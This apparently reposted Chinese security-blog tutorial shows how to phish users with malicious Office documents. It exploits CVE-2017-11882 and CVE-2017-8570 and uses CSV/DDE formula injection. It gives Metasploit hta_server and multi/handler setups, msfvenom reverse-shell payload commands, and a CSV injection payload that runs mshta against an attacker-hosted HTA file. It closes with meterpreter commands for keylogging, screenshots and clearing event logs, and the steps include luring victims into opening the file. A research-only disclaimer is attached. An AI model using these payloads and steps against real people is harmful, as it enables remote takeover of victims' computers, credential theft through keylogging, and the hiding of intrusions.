社工钓鱼之Office钓鱼(下)

admin
admin
admin
138858
文章
114
评论
2023年5月15日18:34:46评论44 views字数 2596阅读8分39秒阅读模式
CVE-2017-11882
影响范围

  • MicrosoftOffice 2000 

  • MicrosoftOffice 2003 

  • MicrosoftOffice 2007 Service Pack 3 

  • MicrosoftOffice 2010 Service Pack 2 

  • MicrosoftOffice 2013 Service Pack 1

  • MicrosoftOffice 2016

漏洞说明

CVE-2017-11882是微软公布的一个远程执行漏洞,该漏洞的成因是EQNEDT32.EXE进程在读入包含MathType的OLE数据时,在拷贝公式字体名称时没有对名称长度进行校验,从而造成栈缓冲区溢出,是一个非常经典的栈溢出漏洞,该漏洞主要影响以下应用:

实验步骤

Step 1:使用MSF框架的hta_server模块生成载荷

use exploit/windows/misc/hta_serverset payload windows/meterpreter/reverse_tcpset LHOST 192.168.174.129set SRVPORT 9999set URIPATH abc

社工钓鱼之Office钓鱼(下)

Step 2:使用EXP生成带有恶意命令的doc文件

社工钓鱼之Office钓鱼(下)

Step 3:在靶机上打开test.doc文档,之后切换回kali:

社工钓鱼之Office钓鱼(下)

Step 4:之后成功反弹shell

社工钓鱼之Office钓鱼(下)

CSV Injection
实验说明

CSV公式注入(CSV Injection)是一种会造成巨大影响的攻击向量,攻击这可以向Excel文件中注入可以输出或以CSV文件读取的恶意攻击载荷,当用户打开Excel文件时,文件会从CSV描述转变为原始的Excel格式,包括Excel提供的所有动态功能,在这个过程中,CSV中的所有Excel公式都会执行,当该函数有合法意图时,很易被滥用并允许恶意代码执行

简易测试

在Office的"文件->选项->信任中心"处开启"启用动态数据交换服务器启动"功能:

社工钓鱼之Office钓鱼(下)

之后构造以下恶意载荷:

=1+cmd|' /C calc'!A0

社工钓鱼之Office钓鱼(下)

之后模拟用户打开Excel文件:

社工钓鱼之Office钓鱼(下)

发现载荷成功执行:

社工钓鱼之Office钓鱼(下)

钓鱼实践

这里使用MSF框架来实施攻击:

use exploit/windows/misc/hta_servermsf exploit(windows/misc/hta_server) > set srvhost 192.168.174.129msf exploit(windows/misc/hta_server) > exploit

社工钓鱼之Office钓鱼(下)

之后在Excel中插入恶意载荷

=1+cmd|' /C mshta.exe http://192.168.174.129:8888/Agd7QT.hta'!A0

社工钓鱼之Office钓鱼(下)

保存之后发送给其他用户:

社工钓鱼之Office钓鱼(下)

当用户打开时在MSF端成功上线:

社工钓鱼之Office钓鱼(下)

CVE-2017-8570
影响范围

  • Microsoft Office 2007 Service Pack 3

  • Microsoft Office 2010 Service Pack 2 (32-bit editions)

  • Microsoft Office 2010 Service Pack 2 (64-bit editions)

  • Microsoft Office 2013 RT Service Pack 1

  • Microsoft Office 2013 Service Pack 1 (32-bit editions)

  • Microsoft Office 2013 Service Pack 1 (64-bit editions)

  • Microsoft Office 2016 (32-bit edition)

  • Microsoft Office 2016 (64-bit edition)

漏洞说明

CVE-2017-8570漏洞是一个逻辑漏洞,由于该漏洞和SandWorm(沙虫)漏洞非常类似,因此我们称之为"沙虫"二代漏洞

简易测试

Step 1:生成恶意PPSX文件(这里的10.0.0.103为攻击者的IP地址)

https://github.com/Heptagrams/Heptagram/tree/master/Windows%20Office/CVE-2017-8570

python cve-2017-8570_toolkit.py -M gen -w Invoice.ppsx -u http://192.168.174.129/logo.doc

社工钓鱼之Office钓鱼(下)

Step 2:生成反弹shell的exe文件:

#64位msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.174.129 LPORT=6666 -f exe > shell.exe#32位msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.174.129 LPORT=6666 -f exe > shell.exe
PS:LHOST是攻击者的IP,LPORT这里设置的是监听本机的6666端口

社工钓鱼之Office钓鱼(下)

Step 3:监听来自ppsx执行反弹shell

python cve-2017-8570_toolkit.py -M exp -e http://192.168.174.129/shell.exe -l shell.exe

社工钓鱼之Office钓鱼(下)

Step 4:设置MSF监听

msf > use exploit/multi/handlermsf > set LHOST 192.168.174.129msf > set LPORT 6666msf > set set PAYLOAD windows/x64/meterpreter/reverse_tcpmsf > exploit

社工钓鱼之Office钓鱼(下)

Step 5:将恶意ppt文件发送给受害者用户并诱导其打开文档

社工钓鱼之Office钓鱼(下)

Step 6:成功反弹shell回来

社工钓鱼之Office钓鱼(下)

Step 7:执行命令

社工钓鱼之Office钓鱼(下)

Step :8:后续渗透工作可以在MSF中展开

meterpreter> getuid //获取当前用户ID  meterpreter > screenshot //截图并保存  meterpreter > keyscan_start //开启键盘记录  meterpreter > keyscan_dump //查看键盘记录内容  meterpreter > keyscan_stop //关闭键盘记录  meterpreter > clearev //清除日志  meterpreter > shutdown //关机  meterpreter > uictl disable mouse //禁止使用鼠标  meterpreter > shell //控制windows的cmd命令行


原文始发于微信公众号(七芒星实验室):社工钓鱼之Office钓鱼(下)

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年5月15日18:34:46
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   社工钓鱼之Office钓鱼(下)https://cn-sec.com/archives/1734782.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息